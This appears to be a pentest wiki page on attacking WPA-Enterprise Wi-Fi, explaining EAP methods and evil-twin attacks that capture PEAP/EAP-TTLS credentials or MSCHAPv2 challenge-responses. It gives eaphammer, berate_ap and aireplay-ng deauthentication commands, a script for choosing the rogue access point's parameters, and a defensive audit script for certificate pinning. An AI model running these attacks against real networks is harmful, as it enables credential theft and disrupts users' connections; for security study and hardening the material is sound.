WPA-Enterprise

WPA-Enterprise delegates authentication to a RADIUS server. Unlike WPA-PSK there is no handshake to capture and crack offline, but clients that do not properly validate the RADIUS server's certificate can be lured to an evil-twin access point that harvests their credentials or challenge-responses.

Theory

WPA-Enterprise, also referred to as WPA-EAP or WPA-802.1X, relies on the EAP authentication framework (carried over the wireless link by IEEE 802.1X), which provides a transport for many authentication methods such as:

These authentication methods allow the access point to delegate authentication to a RADIUS server: the access point only relays EAP messages between the client (supplicant) and the RADIUS server and never handles the credentials itself.

EAP.png

Certificate Authentication

All modern clients use EAP-TLS when they need to authenticate with a certificate. Unlike HTTPS, where client certificates are optional and rarely used, EAP-TLS is built for mutual authentication: the RADIUS server presents its certificate and the client presents its own, and most EAP-TLS deployments require the client certificate without any option to disable it.

EAP-TLS.png

Credentials Authentication

Most modern clients use PEAP or EAP-TTLS when they need to authenticate with a username and password. These protocols, similar in design, consist of two authentication layers: an outer TLS tunnel, in which the client is supposed to authenticate the RADIUS server by its certificate, and an inner authentication method (typically EAP-MSCHAPv2 for PEAP; MSCHAPv2, PAP or CHAP among others for EAP-TTLS) that carries the user's credentials inside the tunnel:

PEAP_EAP-TTLS.png

Evil-Twin Attack

This attack consists of creating a rogue access point mimicking the targeted ESSID, backed by your own RADIUS server, so that clients terminate the outer TLS tunnel with the rogue server and perform the inner authentication against it. This lets you capture the credentials (cleartext for PAP/GTC) or the challenge-response (MSCHAPv2, crackable offline) sent during inner authentication.

This attack will not work against clients configured to validate the RADIUS server certificate against a pinned CA and an expected server name (and to refuse the connection, rather than prompt the user, when validation fails), nor against clients using EAP-TLS, since no password is ever sent to the rogue server.
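
A client is only protected if its supplicant profile actually pins the RADIUS server, i.e. a trusted CA plus an expected server name. The following script is an added example, not part of this page nor of eaphammer or hostapd-mana: it audits a wpa_supplicant.conf for WPA-EAP network blocks that lack either setting, and embeds a constructed sample with one exposed and one hardened profile (the CA path and server name in the sample are assumptions).

```shell
#!/bin/sh
# Audit wpa_supplicant network blocks for evil-twin exposure (added example).
# An EAP profile is considered hardened only if it both trusts a specific CA
# (ca_cert=) and pins the server identity (domain_match=, domain_suffix_match=
# or subject_match=); without both, a rogue RADIUS server with any certificate
# is accepted and the inner authentication (e.g. MSCHAPv2) goes to the attacker.
# Prints "OK <ssid>" or "WEAK <ssid>: <missing settings>" per EAP network and
# returns 0 only when every EAP network is pinned.
audit_eap_config() {
    awk '
    function flush() {
        if (in_block && eap) {
            missing = ""
            if (!ca)   missing = missing " ca_cert"
            if (!name) missing = missing " domain_match/domain_suffix_match/subject_match"
            if (missing == "") print "OK " ssid
            else { print "WEAK " ssid ":" missing; weak++ }
        }
        in_block = 0; eap = 0; ca = 0; name = 0; ssid = "?"
    }
    /^[ \t]*network[ \t]*=[ \t]*[{]/ { flush(); in_block = 1; next }
    /^[ \t]*}/                       { flush(); next }
    in_block {
        # strip indentation and trailing comments (a "#" inside a quoted
        # password would be cut too; acceptable for an audit of pinning)
        sub(/^[ \t]+/, ""); sub(/[ \t]*#.*$/, "")
        eq = index($0, "=")
        if (eq == 0) next
        key = substr($0, 1, eq - 1); val = substr($0, eq + 1)
        gsub(/"/, "", val)
        if (key == "ssid") ssid = val
        if (key == "key_mgmt" && val ~ /WPA-EAP|IEEE8021X/) eap = 1
        if (key == "ca_cert" && val != "") ca = 1
        if (key ~ /^(domain_match|domain_suffix_match|subject_match)$/ && val != "") name = 1
    }
    END { flush(); exit (weak > 0) }
    ' "$1"
}

# Constructed sample config (not from a real deployment): the first block is
# exposed, the second pins CA and server name. Path and name are assumptions.
write_sample_config() {
    cat > "$1" <<'EOF'
network={
    ssid="Corp-WiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="Corp-WiFi-Hardened"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
EOF
}

# Demo: run with "demo" as the only argument. In practice, source this file
# and call audit_eap_config /etc/wpa_supplicant/wpa_supplicant.conf
if [ "${1:-}" = "demo" ]; then
    f=$(mktemp)
    write_sample_config "$f"
    audit_eap_config "$f" || echo "at least one EAP profile will accept an evil twin"
    rm -f "$f"
fi
```

The same two settings are what to look for in Windows (Validate server certificate plus Connect to these servers) and Android (CA certificate plus Domain) profiles; a profile that merely warns the user on certificate mismatch is still in the exposed category.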

eaphammer

Warning

This tool needs to be run from its installation directory, i.e. ./eaphammer.

First, generate a fake certificate for the rogue RADIUS server:

./eaphammer --cert-wizard

Then, start the evil-twin access point with the name of the targeted ESSID:

./eaphammer -i <iface> -e <ESSID> --creds

Use the following additional options to fine-tune the evil-twin access point configuration:

Option                   Description
-b [00:11:22:33:44:55]   Access point BSSID (reuse the legitimate AP's BSSID so it matches saved client profiles)
--hw-mode [g/a]          Hardware mode: g for 2.4 GHz, a for 5 GHz
-c [channel]             Access point channel (list of WLAN channels)

When a client tries to authenticate to your rogue access point, eaphammer should display the captured MSCHAPv2 challenge-response in hashcat -m 5500 (NetNTLMv1) format, ready for offline cracking.

wpa-eap-eaphammer.png

In order to increase the chance of clients connecting to your rogue access point, send spoofed de-authentication frames to the legitimate one. The injecting interface must be in monitor mode and on the legitimate AP's channel; omit -c to broadcast the de-authentication to every client of that BSSID. Clients that negotiated 802.11w (Protected Management Frames) with the AP discard unprotected de-authentication frames, so this will not work against PMF-required networks.

aireplay-ng -0 <count> -a <BSSID> -c [client mac] <interface>
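
The BSSID, band and channel that eaphammer's -b, --hw-mode and -c options expect, as well as the PMF status that decides whether the de-authentication trick can work, can all be read from an iw scan. The following script is an added example, not part of this page nor of eaphammer or aircrack-ng; it parses "iw dev <iface> scan" output and embeds a constructed scan (not a real capture) as sample input.

```shell
#!/bin/sh
# Pick evil-twin parameters from "iw dev <iface> scan" output (added example).
# For every BSS advertising the target ESSID, print: BSSID, eaphammer hw-mode
# (g for 2.4 GHz, a for 5 GHz), channel, whether the AP uses 802.1X, and its
# 802.11w/PMF status. Spoofed deauth frames are discarded by associations that
# negotiated PMF, so MFP-required targets cannot be kicked with aireplay-ng -0.
# Usage: iw dev wlan0 scan | parse_scan "Corp-WiFi"
parse_scan() {
    awk -v want="$1" '
    function flush() {
        if (bssid != "" && ssid == want) {
            # channel from centre frequency (2.4 GHz ch 1-13, 5 GHz band)
            mode = (freq < 3000) ? "g" : "a"
            chan = (freq < 3000) ? (freq - 2407) / 5 : (freq - 5000) / 5
            pmf  = (mfp == 2) ? "MFP-required" : (mfp == 1) ? "MFP-capable" : "MFP-off"
            printf "%s %s %d %s %s\n", bssid, mode, chan, (eap ? "802.1X" : "not-802.1X"), pmf
        }
        bssid = ""; ssid = ""; freq = 0; eap = 0; mfp = 0
    }
    /^BSS / { flush(); bssid = $2; sub(/\(.*/, "", bssid); next }
    /^[ \t]*freq:/ { freq = $2 + 0 }
    /^[ \t]*SSID:/ { ssid = substr($0, index($0, "SSID:") + 6) }
    /Authentication suites:/ && /IEEE 802\.1X/ { eap = 1 }
    /Capabilities:/ && /MFP-required/ { mfp = 2 }
    /Capabilities:/ && /MFP-capable/ && mfp < 2 { mfp = 1 }
    END { flush() }
    '
}

# Constructed scan output in the iw format (not a real capture): two 802.1X
# BSSs of the target ESSID, one of them requiring PMF, plus an unrelated PSK AP.
sample_scan() {
    cat <<'EOF'
BSS 00:11:22:33:44:55(on wlan0)
    freq: 2437
    signal: -41.00 dBm
    SSID: Corp-WiFi
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: IEEE 802.1X
         * Capabilities: 1-PTKSA-RC 1-GTKSA-RC MFP-required MFP-capable (0x00cc)
BSS 66:77:88:99:aa:bb(on wlan0)
    freq: 5180
    signal: -60.00 dBm
    SSID: Corp-WiFi
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: IEEE 802.1X
         * Capabilities: 1-PTKSA-RC 1-GTKSA-RC MFP-capable (0x008c)
BSS cc:dd:ee:ff:00:11(on wlan0)
    freq: 2412
    signal: -70.00 dBm
    SSID: Guest
    RSN:     * Version: 1
         * Authentication suites: PSK
         * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x000c)
EOF
}

# Demo against the constructed scan: run with "demo" as the only argument.
if [ "${1:-}" = "demo" ]; then
    sample_scan | parse_scan "Corp-WiFi"
fi
```

On the sample, the 5 GHz BSS is the better evil-twin target: it is only MFP-capable, so legacy clients can still be de-authenticated, whereas every client of the MFP-required 2.4 GHz BSS will ignore spoofed frames and must be waited for (or caught at a location where the rogue AP is the only one in range).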

hostapd-mana

Using berate_ap (a create_ap fork) together with hostapd-mana, it is possible to create an evil-twin access point configured to intercept credentials from various EAP methods:

berate_ap -n <iface> <ESSID> --eap --mana-wpe --mana-credout [/path/to/output]

This will prompt you for the information required to generate the rogue RADIUS server certificate. Use the following additional options to fine-tune the evil-twin access point configuration:

Option                     Description
--mac [00:11:22:33:44:55]  Access point BSSID
-c [channel]               Access point channel (list of WLAN channels)
--freq-band [2.4/5]        Frequency band
--ieee80211ac              Enable IEEE 802.11ac

See berate_ap -h and hostapd-mana wiki for more details.

When a client tries to authenticate to your rogue access point, hostapd-mana should display the captured credentials and save them, together with their hashcat format, in the file specified by --mana-credout.

wpa-eap-hostapd-mana.png

As with eaphammer, send spoofed de-authentication frames from a monitor-mode interface on the legitimate AP's channel to push clients onto the rogue access point (this does not work against clients that negotiated 802.11w/PMF):

aireplay-ng -0 <count> -a <BSSID> -c [client mac] <interface>
